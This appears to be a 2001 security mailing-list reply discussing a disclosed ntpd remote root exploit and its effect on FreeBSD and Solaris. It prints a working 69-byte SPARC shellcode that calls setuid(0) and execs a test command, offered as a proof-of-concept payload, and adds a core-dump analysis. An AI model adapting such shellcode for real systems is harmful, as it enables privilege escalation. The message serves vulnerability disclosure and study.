From: Alexander Gall (gallSWITCH.CH)
Date: Fri Apr 06 2001 - 06:27:20 CDT

    > On Wed, Apr 04, 2001 at 06:49:01PM -0700, Crist Clark wrote:
    > > Przemyslaw Frasunek wrote:
    > > >
    > > > /* ntpd remote root exploit / babcia padlina ltd. <venglinfreebsd.lublin.pl> */
    > >
    > > Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE with
    > > the stock 4.0.99b. FreeBSD has a fix in CURRENT already.
    > >
    > > More sobering, blindly aiming the exploit code at a Sparc running xntpd 3.4y
    > > caused it to seg. fault and core. No time to double-check if that is actually
    > > exploitable at this moment. How many NTP distributions are based off of the
    > > vulnerable code? With the small payload, gaining access might be hard, but
    > > the potential for DoS looks pretty easy.
    >
    > We've taken a peek at getting sparc shellcode working with this. Getting
    > it in below the 70 byte buffer size is tricky.
    >
    > Does anybody out there have working shellcode for this that can do *anything*
    > to the state of the system even if it doesn't lead to full sploit? (beyond
    > making ntp core of course ;) )

    Well, here is a shellcode that is 69 bytes large and execs
    '/bin/touch /tmp/test' as root (if called from a setuid root program)

    char shellcode[]=
    "\x90\x10\x20\x00" /* mov 0, %o0 */
    "\x82\x10\x20\x17" /* mov 23, %g1 */
    "\x91\xd0\x20\x08" /* ta 8 -> setuid(0) */
    "\x30\x80\x00\x07" /* ba,a bounce */
    "\x90\x03\xe0\x08" /* start: add %o7, 8, %o0 */
    "\x92\x03\xa0\x40" /* add %sp, 64, %o1 */
    "\xd0\x22\x40\x00" /* st %o0, [%o1] */
    "\xc0\x22\x60\x04" /* st %g0, [%o1+4] */
    "\x82\x10\x20\x0b" /* mov 11, %g1 */
    "\x91\xd0\x20\x08" /* ta 8 -> exec() */
    "\x7f\xff\xff\xfa" /* bounce: call start */
    "\x01\x00\x00\x00" /* nop */
    "/bin/touch /tmp/test";

    I don't know if you are aware of this, but simply replacing the shellcode in
    the exploit won't work because of the differing layout of a stack frame on
    SPARC.

    I have also verified that xntpd 3.4y crashes on Solaris 8 with SIGSEGV.
    However, when I looked at the core dump I had the impression that this is
    *not* due to a buffer overflow because I couldn't find any of the symptoms
    that I would expect in such a case (jump to never-never land because the
    overwritten return address on the stack is garbage, %l and %i registers
    filled with data from the buffer). I didn't look too hard though, so I may
    be wrong.

    Alex.

     ___________ SWITCH - The Swiss Academic and Research Network ___________
     Alexander Gall, SWITCH, Limmatquai 138, CH-8001 Zurich, Switzerland
     gallswitch.ch Tel: +41 1 268 1522 Fax: +41 1 268 1568